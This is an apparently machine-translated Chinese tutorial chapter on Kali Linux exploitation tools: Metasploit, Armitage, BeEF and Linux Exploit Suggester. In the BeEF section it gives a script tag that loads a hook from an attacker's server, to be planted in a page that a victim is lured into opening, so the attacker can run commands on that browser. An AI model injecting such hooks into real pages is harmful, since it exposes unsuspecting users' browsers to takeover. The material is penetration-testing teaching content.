Kali Linux – 漏洞利用工具
Kali Linux – 漏洞利用工具
在本章中,我们将了解 Kali Linux 提供的各种开发工具。
元破解
正如我们之前提到的,Metasploit 是 Rapid7 的产品,大部分资源都可以在他们的网页www.metasploit.com上找到。它有两个版本 – 商业版和免费版。这两个版本之间的差异不大,因此在这种情况下,我们将使用社区版(免费)。
作为道德黑客,您将使用嵌入了 Metasploit 社区版本的“Kali Ditribution”,以及通过节省安装时间而非常舒适的其他道德黑客工具。但是,如果您想作为单独的工具安装,它是一个可以安装在 Linux、Windows 和 OS X 等操作系统中的应用程序。
首先,在 Kali 中打开 Metasploit 控制台。然后,转到应用程序 → 漏洞利用工具 → Metasploit。
启动后,您将看到以下屏幕,其中 Metasploit 的版本以红色下划线标出。
在控制台中,如果您使用 help 或 ? 符号,它将显示一个包含 MSP 命令及其描述的列表。您可以根据自己的需要和将使用的内容进行选择。
另一个重要的管理命令是msfupdate,它有助于使用最新的漏洞利用更新 metasploit。在控制台中运行此命令后,您必须等待几分钟才能完成更新。
它有一个名为“搜索”的好命令,您可以使用它来查找您想要的内容,如下面的屏幕截图所示。例如,我想查找与 Microsoft 相关的漏洞,命令可以是msf >search name:Microsoft type:exploit。
其中“search”是命令,“name”是我们要查找的对象的名称,“type”是我们要查找的脚本类型。
另一个命令是“信息”。它提供有关使用它的模块或平台的信息、作者是谁、漏洞参考以及这可能具有的有效负载限制。
阿米蒂奇
用于 metasploit 的 Armitage GUI 是 metasploit 的补充工具。它可视化目标、推荐漏洞利用并公开高级后漏洞利用功能。
让我们打开它,但首先应该打开并启动 metasploit 控制台。要打开 Armitage,请转到 Applications → Exploit Tools → Armitage。
单击“连接”按钮,如下面的屏幕截图所示。
当它打开时,您将看到以下屏幕。
Armitage 是用户友好的。“目标”区域列出了您发现并正在使用的所有机器,被黑的目标是红色的,上面有雷雨。
攻击目标后,您可以右键单击它并继续探索您需要做的事情,例如探索(浏览)文件夹。
在下面的 GUI 中,您将看到文件夹的视图,称为控制台。只需单击文件夹,您就可以在不需要 metasploit 命令的情况下浏览文件夹。
在 GUI 的右侧,是列出漏洞模块的部分。
牛肉
BeEF 代表浏览器开发框架。它是一个专注于网络浏览器的渗透测试工具。BeEF 允许专业渗透测试人员使用客户端攻击向量评估目标环境的实际安全状况。
首先,您必须使用以下命令更新 Kali 包 –
root@kali:/# apt-get update root@kali:/# apt-get install beef-xss
首先,使用以下命令 –
root@kali:/# cd /usr/share/beef-xss root@kali:/# ./beef
打开浏览器,输入用户名和密码:beef。
BeEF hook 是托管在 BeEF 服务器上的 JavaScript 文件,需要在客户端浏览器上运行。当它这样做时,它会回调 BeEF 服务器,传达有关目标的大量信息。它还允许针对目标运行其他命令和模块。在这个例子中,BeEF hook的位置是http://192.168.1.101:3000/hook.js。
为了攻击浏览器,请在客户端将查看的页面中包含 JavaScript 钩子。有多种方法可以做到这一点,但最简单的方法是将以下内容插入页面并以某种方式让客户端打开它。
<script src = "http://192.168.1.101:3000/hook.js" type = "text/javascript"></script>
页面加载后,返回 BeEF 控制面板并单击左上角的“在线浏览器”。几秒钟后,您应该会看到代表已上钩的浏览器的 IP 地址弹出窗口。将鼠标悬停在 IP 上将快速提供诸如浏览器版本、操作系统和安装的插件等信息。
要远程运行命令,请单击“拥有的”主机。然后,在命令上单击要执行的模块,最后单击“执行”。
Linux漏洞利用建议
考虑到 Linux 操作系统的发行版“uname -r”,它暗示了可能的漏洞利用。
要运行它,请键入以下命令 –
root@kali:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0
3.0.0是我们要利用的 Linux 操作系统的内核版本。